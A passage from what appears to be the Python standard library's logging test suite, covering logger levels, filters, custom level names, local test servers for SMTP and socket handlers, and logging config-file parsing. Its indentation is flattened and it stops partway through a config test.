# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
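# Unlike test_filter above, the filter here is a plain callable rather than
# a logging.Filter instance; addFilter accepts any callable that takes a
# record and returns a truthy/falsy value.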
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
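# These names are attached to the numeric levels via logging.addLevelName in
# CustomLevelsAndFiltersTest.setUp below, e.g. (illustrative only):
#
# logging.addLevelName(SILENT, 'Silent')
# logging.getLogger().log(SILENT, 'a message logged at the Silent level')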
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatedly
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
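# Typical usage (see SMTPHandlerTest.test_basic below): construct the server
# with port 0 so the OS assigns a free port, call start(), point an
# SMTPHandler at (host, server.port), and call stop() once the message has
# been handled.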
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
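# The concrete test servers below mix ControlMixin into HTTPServer and the
# threading TCP/UDP socketservers; tests call start(), wait on the 'ready'
# event, and call stop() from tearDown (see e.g. SocketHandlerTest).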
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:param bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:param bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# config2 misspells the stream name (sys.stbout), so applying it should fail.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# config3 refers to a misspelled formatter name, so applying it should fail.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
